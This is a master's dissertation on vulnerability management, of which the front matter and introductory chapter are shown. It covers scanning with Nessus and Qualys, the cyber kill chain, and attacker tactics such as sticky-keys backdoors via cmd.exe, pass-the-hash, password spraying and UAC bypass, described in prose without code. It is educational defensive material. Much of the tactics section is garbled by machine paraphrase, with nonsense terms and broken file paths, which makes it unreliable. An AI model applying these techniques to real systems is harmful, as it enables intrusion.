Vulnerability Management and

Simulation

A dissertation submitted in partial fulfillment

of the requirements for the degree of

Master of Technology
in

Computer Science & Engineering

with specialization in Cloud Computing

by

Pallerla Vishnu vardhan reddy

17MCC1004

School of Computing Science & Engineering,

VIT University Chennai,

Vandalur-Kelambakkam Road,

Chennai - 600127, India.

March 2019
 Declaration

I hereby declare that the dissertation Vulnerabilty management and simulation

submitted by me to the School of Computing Science and Engineering, VIT University
Chennai, 600 127 in partial fulfillment of the requirements for the award of Master of
Technology in Computer Science & Engineering with specialization in Cloud
Computing is a bona-fide record of the work carried out by me under the supervision
of Dr. Neela Narayanan V .
I further declare that the work reported in this dissertation, has not been submitted
and will not be submitted, either in part or in full, for the award of any other degree or
diploma of this institute or of any other institute or University.

Sign:

Name & Reg. No.:

Date:
 School of Computing Science & Engineering

Certificate

This is to certify that the dissertation entitled Vulnerability Management and Sim-
ulation submitted by Pallerla Vishnu vardhan reddy (Reg. No. 17MCC1005)
to VIT University Chennai, in partial fulfullment of the requirement for the award of
the degree of Master of Technology in Computer Science & Engineering with
specialization in Cloud Computing is a bona-fide work carried out under my super-
vision. The dissertation fulfills the requirements as per the regulations of this University
and in my opinion meets the necessary standards for submission. The contents of this
dissertation have not been submitted and will not be submitted either in part or in full,
for the award of any other degree or diploma and the same is certified.

Supervisor Program Chair

Signature: .................... Signature: ....................

Name: .................... Name: ....................

Date: Date:

Examiner

Signature: ....................

Name: ....................

Date:

(Seal of the School)

 Abstract

The number of vulnerabilities has been increasing day by day, and its becoming very easy
for the attackers to hack the systems or performing DOS attacks etc. on organisation.
Although there is a chance to defend this kind of attacks, the people in the organization
doesnt realize the essentiality of removing the vulnerabilities and patching the software,
applications and computer systems. This project focuses on finding the vulnerabilities
and remediating them using vulnerability assessment scanners like Qualys and Nessus.
Vulnerability Assessment will help the organization to find the loopholes or Weakness
in security, improperly configured systems or devices and perform the necessary actions
to improve their security for their assets. In this project we will also show an attack
based on the weakness in the windows system, the ways to find and remediate the
vulnerabilities, and the ways we can gather information related to the organization.
 Acknowledgements
I wish to express my sincere thanks to Dr.G.Viswanathan, Chancellor, Mr. Sankar
Viswanathan, Vice President, Ms. Kadhambari S. Viswanathan, Assistant Vice Presi-
dent, Dr. Anand A. Samuel, Vice Chancellor and Dr. P. Gunasekaran, Pro-Vice Chan-
cellor for providing me an excellent academic environment and facilities for pursuing
M.Tech. program. I am grateful to Dr. Vaidehi Vijayakumar, Dean of School of Com-
puting Science and Engineering, VIT University, Chennai and to Dr. V. Vijayakumar,
Associate Dean. I wish to express my sincere gratitude to Dr. Geetha S, Program
chair of M.Tech CSE/Big Data/Cloud Computing for providing me an opportunity to
do my project work. I would like to express my gratitude to my internal guide Dr.Neela
Narayana V and my external guide Mr. Natarajan Elangovan who inspite of their buy
schedule guided me in the correct path. I am thankful to Virtusa Private Service limited
for giving me an opportunity to work on my project and helped me gain knowledge. I
thank my family and friends who motivated me during the course of the project work.
...

iv
Contents

Declaration i

Certificate ii

Abstract iii

Acknowledgements iv

List of Figures vii

1 Introduction 1
1.1 Vulnerability Management . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.1.1 Importance of Vulnerability Assessments+ . . . . . . . . . . . . . . 3
1.2 Types of vulnerability assessments . . . . . . . . . . . . . . . . . . . . . . 3
1.3 Vulnerability Management Life Cycle . . . . . . . . . . . . . . . . . . . . . 4
1.4 Cyber Kill Chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.4.1 Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.4.2 Weaponization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.4.3 Delivery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.4.4 Exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.4.5 Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4.6 Command And Control . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4.7 Actions On Objectives . . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4.8 Defense In Depth Recommendations . . . . . . . . . . . . . . . . . 8
1.5 Techniques and tactics based on real world observations . . . . . . . . . . 9
1.5.1 Initial Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
1.5.2 Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
1.5.3 Persistence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
1.5.4 Privilege Escalation . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.5.5 Defense Evasion . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.5.6 Credential Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
1.5.7 Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
1.5.8 Lateral Movement . . . . . . . . . . . . . . . . . . . . . . . . . . . 15

v
Contents vi

1.5.9 Collection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1.5.10 Exfiltration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1.5.11 Command and control . . . . . . . . . . . . . . . . . . . . . . . . . 17

2 Literature Survey 18
2.1 Vulnerability assessment and patching management . . . . . . . . . . . . . 18
2.2 The Research on a Patch Management System for Enterprise Vulnerabil-
ity Update . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
2.3 Automated and Safe Vulnerability Assessment . . . . . . . . . . . . . . . . 19
2.4 Integrated Vulnerability Management System for Enterprise Networks . . 19
2.5 Vulnerability Assessment and Penetration Testing of Web Application . . 20

3 Experimental Design & Setup 21

3.1 Nessus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
3.2 Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
3.3 Nmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
3.4 Python . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
3.5 Maltego . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
3.6 OSINT Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
3.7 Command and Control Activity . . . . . . . . . . . . . . . . . . . . . . . 34

4 Experiments & Results 35

4.1 Vulnerability Management using Nessus . . . . . . . . . . . . . . . . . . . 35
4.1.1 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
4.2 Vulnerability Management using Qualys . . . . . . . . . . . . . . . . . . . 39
4.2.1 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
4.3 Cyber Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
4.3.1 code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52

5 Conclusions 53
5.1 Vulnerability management . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
5.1.1 Future Enhancement . . . . . . . . . . . . . . . . . . . . . . . . . . 53

Bibliography 55
List of Figures

1.1 Vulnerability Management Life Cycle . . . . . . . . . . . . . . . . . . . . . 2

1.2 Vulnerability Management Life Cycle . . . . . . . . . . . . . . . . . . . . . 6

3.1 Nessus Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

3.2 Vulnerability Management Life Cycle . . . . . . . . . . . . . . . . . . . . . 24
3.3 Open Source Intellignece Framework(OSINT) . . . . . . . . . . . . . . . . 32
3.4 sub domains of OSINT framework . . . . . . . . . . . . . . . . . . . . . . 33

4.1 List of scans performed . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36

4.2 Categorization of Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . 36
4.3 List of Vulnerabilities after Scanning . . . . . . . . . . . . . . . . . . . . . 37
4.4 Detail information about Vulnerability . . . . . . . . . . . . . . . . . . . . 38
4.5 Qualys Dashboard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
4.6 Knowledge Base of Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
4.7 Search List in Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
4.8 Host Assets in Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
4.9 Asset Groups in Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
4.10 Option profiles in Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
4.11 List of Scans Created . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
4.12 scan details after scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
4.13 Vulnerability with severity and operating system details . . . . . . . . . . 45
4.14 Vulnerabilities with detailed information . . . . . . . . . . . . . . . . . . . 45
4.15 scanning the active directory for SPN values . . . . . . . . . . . . . . . . . 46
4.16 Scanning the segment for live hosts . . . . . . . . . . . . . . . . . . . . . . 48
4.17 Transfering the payload to live hosts . . . . . . . . . . . . . . . . . . . . . 49
4.18 Command and control with the users . . . . . . . . . . . . . . . . . . . . . 50
4.19 Transfer the malicious file to the users . . . . . . . . . . . . . . . . . . . . 50
4.20 Exfiltration the confidential data . . . . . . . . . . . . . . . . . . . . . . . 51
4.21 Command and control code . . . . . . . . . . . . . . . . . . . . . . . . . . 52

vii
For/Dedicated to/To my. . .

viii
Chapter 1

Introduction

1.1 Vulnerability Management

Information Security has become a most highly demanded service in the last few years
since ICT(information and communication technologies) have covered almost the entire
business world.

Nowadays , many organizations are storing all kind of information in the computers,
starting with bank accounts details, personal staff data, clients projects details, mar-
keting details, etc., therefore they are becoming the target of evaluation(TOE) for the
attackers to gain the confidential information. We can see everywhere in news, papers,
reports regarding the malicious activities and data breaches, Dos attacks etc.

Information security (IS) means to provide to protection for sensible information and
systems which contain confidential data from unauthorized people and mainly from any
modification, disruption, and destruction. It would be very hard the organizations to
operate without information protection. The systems should be regularly checked for
vulnerabilities and have to provide solution for the vulnerabilites

With the increase in usage of online resources and web in last twenty years, the confiden-
tiality, integrity and availability of information, resources are in big threat. Every Day
we find can new ways of Exploitation and Hacking, so finding the Vulnerabilities and
installing the security patches is very important for each internet facing organization.
So, Identifying the Vulnerabilities and remediating or mitigating them has become the
major task for organization. To reduce the threat and risk of the resources in an orga-
nization, they will conduct the vulnerability Assessment on regular basis to improve the
security posture of organization. Vulnerability scanners has become a system security

1
Chapter 1. Introduction 2

tools those can identify the existing vulnerabilities in the systems before they are ex-
ploited. Even though there are Number of Vulnerability tools available in market, they
cant guarantee after fixing the vulnerabilities the computer cant be exploited.

Figure 1.1: Vulnerability Management Life Cycle

A vulnerability assessment(VA) is the process of classifying, identifying, defining and

prioritizing vulnerabilities in applications,computer systems and network infrastruc-
tures and providing the organization doing the assessment with the necessary awareness,
knowledge and risk background to understand the risks and threats to its environment
and react appropriately.

A vulnerability assessment(VA) is the process that is intended to identify risks and

threats the systems, applications etc., typically involving the use of automated test-
ing tools, such as devices, network security scanners, whose results will be listed in a
Chapter 1. Introduction 3

vulnerability assessment(VA) report.

Any organizations or even individuals who faces an increased risk of cyberattacks, will be
benefited from some form of vulnerability assessment, but big organizations and other
types of enterprises that are subject to ongoing attacks will be benefited most from
vulnerability analysis.

Because security vulnerabilities or weakness in the configuration can enable hackers to

access applications and IT systems, it is essential for large enterprises to identify and
remediate vulnerabilities and weaknesses before they can be exploited. A comprehensive
vulnerability assessment(VA) along with a management program can help the companies
improve their security of their systems and applications.

1.1.1 Importance of Vulnerability Assessments+

A vulnerability assessment assets of an organization provides an organization with details

on the security weaknesses or flaws of the application in its environment and provides
direction on how to assess and mitigate the risks associated with those weaknesses and
evolving threats. This process helps the organization a better understanding of its assets,
applications, security flaws and overall risk, reducing the likelihood that a attackers will
breach its systems and stole the confidential information.

1.2 Types of vulnerability assessments

Vulnerability assessments (VA) depend on discovering or finding different types of system

vulnerabilities, application vulnerabilities or network vulnerabilities, which means the
vulnerability process assessment process includes using a variety of methodologies, tools
and scanners to identify threats, vulnerabilities and risks. Below are Some of the different
types of vulnerability assessment scans:

1) Network-based vulnerability scans are used to discover possible network security at-
tacks. Network scan will help to detect vulnerable systems on wireless networks or wired
networks.

2) Host-based vulnerability scans are used to identify and locate vulnerabilities in work-
stations, servers or other network hosts. Host based scan usually examines services
and services that may also be discovered in network-based scans, but this offers greater
visibility of patch history and configuration settings of scanned systems.
Chapter 1. Introduction 4

3) Wireless network vulnerability scans of an organization’s Wi-Fi networks mainly focus

on points of attack in the wireless network infrastructure. In addition to discovering
rogue access points, a vulnerability scan can also validate that a company’s network is
whether securely configured or not.

4) Application vulnerability scans can be used to test websites or web applications in

order to detect or discover known software vulnerabilities or new vulnerabilities and
misconfigurations in network, websites or web applications.

5) Database vulnerability scans can be used to discover the weak points in a database,
to prevent the attacker from doing attacks like SQL injection.

1.3 Vulnerability Management Life Cycle

Vulnerability Management life cycle will helps an organization to identify the weakness,
security flaws or mis configurations in the computer systems, prioritize the assets, assess
the vulnerabilities, report the vulnerabilities, remediate the vulnerabilities and verify
the vulnerabilities whether they have closed or not.

Vulnerability management life cycle that most of the organizations will follow

Discovery: This is also called as asset inventory or information gathering phase, where
we will find the asset details to scan across the network and identify the details including
open ports, services and operating systems running to identify the vulnerabilities. Set
up a network baseline and identify the security vulnerabilities on regular scheduled basis.

Prioritize assets: Categorize the assets in to business assets and groups based on their
business criticality or dependencies of the projects

Assess: Setup a baseline of the business to remediate the vulnerabilities based on

criticality, risk and vulnerability threat, and asset classification.

Report: Measure the risk associated with assets according to the security policies.
Monitor the suspicious activity, document the security risk and describe the know vul-
nerabilities.

Remediate: Prioritize the vulnerabilities and fix them, establish the proper controls
to mitigate the risks and demonstrate the progress.

Verify: Verify the threats whether they have been remediated and eliminated through
follow up audits.
Chapter 1. Introduction 5

1.4 Cyber Kill Chain

Cyber Kill chain is one of the most industry accepted approach on understanding how
the attacker will perform the attacks on organization. It will explain how the hackers
will cause harm to organization. Cyber kill chain will help the security professional to
establish strong countermeasures and controls to secure their organization assets There
are seven stages in cyber kill chain
1) Reconnaissance
2) Weaponization
3) Delivery
4) Exploitation
5) Installation
6) Command and Control
7) Actions on Objectives

1.4.1 Reconnaissance

Reconnaissance is the first stage in cyber kill chain, this is also called information gath-
ering or foot printing. At this stage the attacker will collect and assess the organization
assets details from both non-technical and technical perspective. Attacker will assess
the target of evaultion and working to determine which asset will give most benefit for
explotation. The hacker will look for information systems with exploitable vulnerabili-
ties and few protections There are two types of information gathering
1) Active information gathering
The hacker will probe the target information systems, the goal of hacker is to uncover
the ports which are vulnerable to explotations and those helps the hackers to gain the
access to the system
Examples:
Nmap
Maltego
Harvester

2) Passive information gathering

The hacker will gather information With out interacting with target systems.
Examples:
Who is
Chapter 1. Introduction 6

Social engineering

Figure 1.2: Vulnerability Management Life Cycle

Chapter 1. Introduction 7

1.4.2 Weaponization

Weaponization is the second stage in cyber kill chain. During this stage malware was
developed by the halcer specifially for vulnerabilities identified during the information
gathering(Reconnaissance). With the information gathered in the reconnaissance phase
the hacker will create their toolset to get in to the network and meet the requirements
For example, if particular Vulnerable version of secure shell is identified then the attacker
would create or build an exploit that will take advantage of secure shell vulnerability.
The exploit kit will try to get the administrative privileges and exploit the systems, the
command and control activity can be build if internet is accessible in the system.

1.4.3 Delivery

In the cyber kill chain Delivery is the third stage, it involves transmitting the APT
code to the target information systems for taking control from the attacker. Based on
present research and analysis from the 2018 Verizon Data Breach Investigation Report,
a network attack is most likely to arise from a spear-phishing attack selecting an internal
employee of the organization.
A carefully crafted and examined spear-phishing campaign against an organization was
based on the data gathered during the reconnaissance phase would result in the orga-
nization’s employees put in affect the APT malware code in their information systems.
Mostly the spear phishing message will most likely contain an attachment such as a
an Adobe PDF document or Microsoft Word document. This pdf or document would
contain code that, when executed, would result in the APT gaining the control on the
organizational network.
Another obatinable opportunity for exploitation is inspecting the organizational public
IP space for not properly managed servers. A lack of cyber sterility practices within the
organization’s network will result in explotable production systems.

1.4.4 Exploitation

Exploitation is the fourth phase in cyber kill chain, the malware code is will be executed
on the target network through local or remote process, taking advantage of indentified
vulnerabilities to gain adminstrartive access to organizational information system that
was targeted.
Chapter 1. Introduction 8

1.4.5 Installation

After the exploitation of the system was successful, then the malware code will be in-
stalled itself into the targeted information system. After installing the malware, it will
begin to download other required software if network access is available. This will make
the delivery payload to remain undetectable and small.
In this example the small size of the malware would have limited functionality. There-
fore, the APT will download other components to penetrate further into the targeted
organization’s network and to have better control and ownership of the exploited infor-
mation systems.

1.4.6 Command And Control

In cyber kill chain, Command and control is the sixth phase. Command and control(c2),
is when the haccker has put in place their communication and management APT code
in the target network. This malicious software helps the hacker to fully get full control
in the targeted environment and allows the hacker to move deeper into the network,
conduct destruction , exfiltrate data and denial of service operations.

1.4.7 Actions On Objectives

The objectives and actions of the malicious software are dependent on its specific mission.
The software could be focused on, denial of service, destruction, and data exfiltration.
In the case of data exfiltration, the software may be interested in organizational propri-
etary confidential data such as customer Personally Identifiable Information, engineering
designs and employee . In the case of a denial of service, , the software may disable a
key component of the organization’s infrastructure to disrupt services temporarily like
the Ukrainian power outage in December 2015.
Finally, in the case of destruction, the software may seek to operate industrial control
systems which are outside of their manufacturing specifications, will results in catas-
trophic failure like the Stuxnet worm.

1.4.8 Defense In Depth Recommendations

The organization are recommended to implement a defense-in-depth plan that will serve
to protect the organization’s process, technology and people in a holistic and layered
fashion. Below are some of the defense in depth areas include:
1) Implementing the enterprise-wide information security program with the leadership
Chapter 1. Introduction 9

authority and backing.

2) Effective user awareness and training related to phishing(email-borne threats )
3) implementing Strong cyber hygiene practices in the organization.

1.5 Techniques and tactics based on real world observa-

tions

Techniques and Tactics that attackers can use when compromising the organization sys-
tems.
Here are 11 tactics that attackers can use
1) Initial Access
2)Execution
3)Persistence
4)Privilege Escalation
5)Defense Evasion
6)Credential Access
7)Discovery
8)Lateral Movement
9)Collection
10)Exfiltration
11)Command and control

1.5.1 Initial Access

The initial access tactic used by attackers represents to gain an initial foothold within
a system, network.
Below are the list of techniques used by the attackers to get the access of the system.
1)Drive-by Compromise
A drive-by trade off is the point at which an enemy accesses a framework through a client
visiting a site over the typical course of perusing. With this procedure, the client’s in-
ternet browser is focused for misuse. This can occur in a few different ways, yet there
are a couple of fundamental segments. Different methods for conveying abuse code to a
program exist, including:
A genuine site is undermined where enemies have infused some type of noxious code, for
example, JavaScript, iFrames, cross-site scripting.
Chapter 1. Introduction 10

Vindictive promotions are paid for and served through genuine advertisement suppliers.
Worked in web application interfaces are utilized for the inclusion of some other sort of
item that can be utilized to show web content or contain a content that executes on the
meeting customer (for example discussion posts, remarks, and other client controllable
web content).
2)Exploit Public-Facing Application
The utilization of programming, information, or directions to exploit a shortcoming in an
Internet-confronting PC framework or program so as to cause unintended or unforeseen
conduct. The shortcoming in the framework can be a bug, a glitch, or a plan defenseless-
ness. These applications are frequently sites, yet can incorporate databases (like SQL)
, standard administrations (like SMB or SSH), and some other applications with Inter-
net available open attachments, for example, web servers and related administrations.
Contingent upon the imperfection being abused this may incorporate Exploitation for
Defense Evasion.
3)Spearphishing Attachment
Spearphishing attachemet is a particular variation of spearphishing. Spearphishing at-
tachment is unique in relation to different types of spearphishing in that it utilizes the
utilization of malware joined to an email. All types of spearphishing are electronically
conveyed social building focused at a particular individual, organization, or industry.
In this situation, enemies connect a record to the spearphishing email and ordinarily
depend upon User Execution to pick up execution.
4)Spearphishing Link
Spearphishing with a link is a particular variation of spearphishing. It is not quite the
same as different types of spearphishing in that it utilizes the utilization of links to
download malware contained in email, rather than appending pernicious records to the
email itself, to stay away from resistances that may examine email links.
Chapter 1. Introduction 11

1.5.2 Execution

The execution tactic speaks to procedures that outcome in execution of enemy controlled
code on a neighborhood or remote framework. This strategy is regularly utilized related
to starting access as the methods for executing code once get to is acquired, and sidelong
development to grow access to remote frameworks on a system.
Below are few techniques used for Execution tactic
1)Command-Line Interface
command line interfaces furnish a method for associating with PC frameworks and is a
typical component crosswise over numerous kinds of working framework stages. [1] One
precedent direction line interface on Windows frameworks is cmd, which can be utilized
to play out various errands including execution of other programming. Order line in-
terfaces can be communicated with locally or remotely by means of a remote work area
application, switch shell session, and so on. Directions that are executed kept running
with the present consent dimension of the order line interface process except if the order
incorporates process conjuring that changes authorizations setting for that execution
(for example Planned Task).
2)Graphical User Interface
The Graphical User Interfaces (GUI) is a typical method to cooperate with a working
framework. Foes may utilize a framework’s GUI amid an activity, usually through a
remote intelligent session, for example, Remote Desktop Protocol, rather than through
a Command-Line Interface, to look for data and execute documents by means of mouse
double tap occasions, the Windows Run order, or other possibly hard to screen connec-
tions.
3)PowerShell
PowerShell is an amazing intelligent direction line interface and scripting condition in-
corporated into the Windows working framework. Enemies can utilize PowerShell to
play out various activities, including disclosure of data and execution of code. Prece-
dents incorporate the Start-Process cmdlet which can be utilized to run an executable
and the Invoke-Command cmdlet which runs an order locally or on a remote PC.

PowerShell may likewise be utilized to download and run executables from the Internet,
which can be executed from plate or in memory without contacting circle.

Director consents are required to utilize PowerShell to associate with remote frameworks.

Various PowerShell-based hostile testing instruments are accessible, including Empire,

PowerSploit, and PSAttack.
4)Scheduled Task
Utilities, for example, at and schtasks, alongside the Windows Task Scheduler, can be
Chapter 1. Introduction 12

utilized to plan projects or contents to be executed at a date and time. An errand

can likewise be planned on a remote framework, gave the best possible confirmation is
met to utilize RPC and record and printer sharing is turned on. Planning an errand
on a remote framework ordinarily required being an individual from the Administrators
amass on the remote framework.

An enemy may utilize task booking to execute programs at framework startup or on

a planned reason for constancy, to lead remote Execution as a component of Lateral
Movement, to pick up SYSTEM benefits, or to run a procedure under the setting of a
predetermined record

1.5.3 Persistence

Persistence is any entrance, activity, or design change to a framework that gives a foe a
relentless nearness on that framework. Enemies will frequently need to keep up access to
frameworks through intrusions, for example, framework restarts, loss of accreditations,
or different disappointments that would require a remote access instrument to restart
or exchange secondary passage for them to recover get to.
1)Accessibility Features
Windows contains availability includes that might be propelled with a key blend before
a client has signed in (for instance, when the client is on the Windows logon screen).
An enemy can alter the manner in which these projects are propelled to get an order
brief or secondary passage without signing in to the framework.
Two basic openness programs are C:32.exe, propelled when the move key is squeezed
multiple times and C:32.exe, propelled when the Windows + U key blend is squeezed.
The sethc.exe program is regularly alluded to as ”sticky keys”, and has been utilized by
foes for unauthenticated access through a remote work area login screen.
For straightforward paired substitution on Windows XP and later just as and Windows
Server 2003/R2 and later, for instance, the program (e.g., C:32.exe) might be supplanted
with ”cmd.exe” (or another program that gives indirect access get to). Consequently,
squeezing the suitable key blend at the login screen while sitting at the console or when
associated over Remote Desktop Protocol will make the supplanted document be exe-
cuted with SYSTEM benefits.
For the debugger technique on Windows Vista and later just as Windows Server 2008
and later, for instance, a Registry key might be adjusted that arranges ”cmd.exe,” or
another program that gives secondary passage access, as a ”debugger” for the openness
program (e.g., ”utilman.exe”). After the Registry is adjusted, squeezing the proper key
mix at the login screen while at the console or when associated with RDP will cause the
Chapter 1. Introduction 13

”debugger” program to be executed with SYSTEM benefits.

2)Account Manipulation
Record control may help enemies in keeping up access to accreditations and certain au-
thorization levels inside a domain. Control could comprise of altering authorizations,
adjusting certifications, including or changing consent gatherings, altering account set-
tings, or adjusting how verification is performed. These activities could likewise incorpo-
rate record movement intended to subvert security approaches, for example, performing
iterative secret word updates to subvert secret key span arrangements and protect the
life of traded off certifications. So as to make or control accounts, the enemy should as
of now have adequate authorizations on frameworks or the area.

1.5.4 Privilege Escalation

Privilege Escalation is the aftereffect of activities that enables an enemy to get a more
elevated amount of authorizations on a framework or system. Certain instruments or
activities require a more elevated amount of benefit to work and are likely important at
numerous focuses all through a task. Foes can enter a framework with unprivileged get
to and must exploit a framework shortcoming to get neighborhood head or SYSTEM/-
root level benefits. A client account with director like access can likewise be utilized.
Client accounts with consents to get to explicit frameworks or perform explicit capac-
ities fundamental for enemies to accomplish their target may likewise be viewed as a
heightening of benefit.
1) Access Token Manipulation
Windows utilizes get to tokens to decide the responsibility for running procedure. A
client can control get to tokens to influence a running procedure to seem like it has a
place with somebody other than the client that began the procedure. At the point when
this happens, the procedure additionally takes on the security setting related with the
new token. For instance, Microsoft advances the utilization of access tokens as a security
best practice. Managers should sign in as a standard client yet run their apparatuses
with chairman benefits utilizing the implicit access token control order runas.

1.5.5 Defense Evasion

Defense EvasionQualification get to speaks to procedures bringing about access to or

power over framework, space, or administration accreditations that are utilized inside an
undertaking domain. Foes will probably endeavor to acquire authentic accreditations
Chapter 1. Introduction 14

from clients or executive records (neighborhood framework chairman or space clients

with overseer access) to use inside the system. This enables the enemy to accept the
character of the record, with the majority of that record’s consents on the framework
and system, and makes it harder for protectors to identify the foe. With adequate access
inside a system, an enemy can make represents later use inside the earth. comprises of
methods an enemy may use to sidestep location or stay away from different safeguards.
Now and again these activities are equivalent to or varieties of strategies in different
classes that have the additional advantage of subverting a specific safeguard or allevia-
tion. Safeguard avoidance might be viewed as a lot of credits the foe applies to every
other period of the task.
1)Bypass User Account Control
Windows User Account Control (UAC) enables a program to lift its benefits to play out
an assignment under director level authorizations by provoking the client for affirma-
tion. The effect to the client ranges from denying the task under high implementation
to enabling the client to play out the activity on the off chance that they are in the
nearby chairmen gathering and navigate the brief or enabling them to enter an overseer
secret word to finish the activity.

1.5.6 Credential Access

Credential Access get to speaks to procedures bringing about access to or power over
framework, space, or administration accreditations that are utilized inside an undertak-
ing domain. Foes will probably endeavor to acquire authentic accreditations from clients
or executive records (neighborhood framework chairman or space clients with overseer
access) to use inside the system. This enables the enemy to accept the character of the
record, with the majority of that record’s consents on the framework and system, and
makes it harder for protectors to identify the foe. With adequate access inside a system,
an enemy can make represents later use inside the earth. 1)Brute Force
Enemies may utilize beast drive systems to endeavor access to accounts when passwords
are obscure or when secret phrase hashes are acquired.

Certification Dumping to get secret key hashes may possibly get a foe so far when Pass
the Hash isn’t a choice. Procedures to deliberately figure the passwords used to register
hashes are accessible, or the foe may utilize a pre-processed rainbow table. Breaking
hashes is normally done on foe controlled frameworks outside of the objective system.

Enemies may endeavor to animal power logins without learning of passwords or hashes
amid an activity either with zero information or by endeavoring a rundown of known
Chapter 1. Introduction 15

or conceivable passwords. This is a less secure alternative since it could cause various
validation disappointments and record lockouts, contingent upon the association’s login
disappointment approaches.

A related system called secret key showering utilizes one secret key, or a little rundown
of passwords, that coordinates the intricacy strategy of the space and might be a usually
utilized secret phrase. Logins are endeavored with that secret word and a wide range
of records on a system to maintain a strategic distance from record lockouts that would
ordinarily happen when savage compelling a solitary record with numerous passwords.

1.5.7 Discovery

Discovery comprises of strategies that enable the enemy to pick up learning about the
framework and inner system. At the point when foes access another framework, they
should situate themselves to what they presently have control of and what benefits work-
ing from that framework provide for their present target or by and large objectives amid
the interruption. The working framework gives numerous local devices that guide in this
post-bargain data gathering stage.
1)Account Discovery
Model directions that can procure this data are net client, net gathering , and net local-
group utilizing the Net utility or through utilization of dsquery. In the event that foes
endeavor to recognize the essential client, as of now signed in client, or set of clients that
normally utilizes a framework, System Owner/User Discovery may apply.

1.5.8 Lateral Movement

Lateral Movement comprises of strategies that empower a foe to access and control re-
mote frameworks on a system and could, yet does not really, incorporate execution of
apparatuses on remote frameworks. The horizontal development procedures could en-
able an enemy to assemble data from a framework without requiring extra apparatuses,
for example, a remote access device.
1)Pass the Hash
Pass the hash (PtH) is a technique for confirming as a client without approaching the
client’s cleartext secret key. This strategy sidesteps standard validation steps that re-
quire a cleartext secret key, moving legitimately into the bit of the confirmation that
utilizes the secret word hash. In this strategy, substantial secret phrase hashes for the
record being utilized are caught utilizing a Credential Access method. Caught hashes
Chapter 1. Introduction 16

are utilized with PtH to validate as that client. When validated, PtH might be utilized
to perform activities on nearby or remote frameworks.

Windows 7 and higher with KB2871997 require substantial space client qualifications or
RID 500 head hashes.

1.5.9 Collection

Collection comprises of procedures used to distinguish and assemble data, for example,
delicate documents, from an objective system preceding exfiltration. This classification
likewise covers areas on a framework or system where the enemy may search for data to
exfiltrate.
1)Data from Local System
sensitive information can be gathered from neighborhood framework sources, for ex-
ample, the document framework or databases of data living on the framework before
Exfiltration.

Enemies will regularly look through the document framework on PCs they have traded
off to discover records of intrigue. They may do this utilizing a Command-Line Interface,
for example, cmd, which has usefulness to cooperate with the document framework to
assemble data. A few foes may likewise utilize Automated Collection on the neighbor-
hood framework.

1.5.10 Exfiltration

Exfiltration alludes to methods and characteristics that outcome or help in the enemy
expelling records and data from an objective system. This class additionally covers areas
on a framework or system where the enemy may search for data to exfiltrate.
1)Automated Exfiltration
Information, might be exfiltrated using computerized preparing or Scripting in the wake
of being assembled amid Collection. At the point when robotized exfiltration is utilized,
other exfiltration procedures likely apply also to exchange the data out of the system,
for example, Exfiltration Over Command and Control Channel and Exfiltration Over
Alternative Protocol.
Chapter 1. Introduction 17

1.5.11 Command and control

The Command and control strategy speaks to how enemies speak with frameworks
under their control inside an objective system. There are numerous ways a foe can build
up direction and control with different dimensions of clandestineness, contingent upon
framework setup and system topology. Because of the wide level of variety accessible
to the foe at the system level, just the most well-known components were utilized to
depict the distinctions in direction and control. There are as yet a considerable number
of explicit strategies inside the reported techniques, to a great extent because of the
fact that it is so natural to characterize new conventions and utilize existing, genuine
conventions and system administrations for correspondence.

The subsequent breakdown should help pass on the idea that identifying interruption
through direction and control conventions without earlier information is a troublesome
recommendation over the long haul. Enemies’ fundamental imperatives in system level
resistance evasion are trying and sending of apparatuses to quickly change their conven-
tions, attention to existing protective advances, and access to real Web benefits that,
when utilized fittingly, make their instruments hard to recognize from considerate traffic.
1)commonly used port
To bypass network detection and firewalls and to have a normal network activity to not
get detected client systems may communicate on a commonly used port.
Commonly open ports such as
TCP:80(HTTP)
TCP:443(HTTPS)
TCP:25(SMTP)
TCP/UDP:53(DNS)
TCP/UDP:135(RPC)
TCP/UDP:22(SSH)
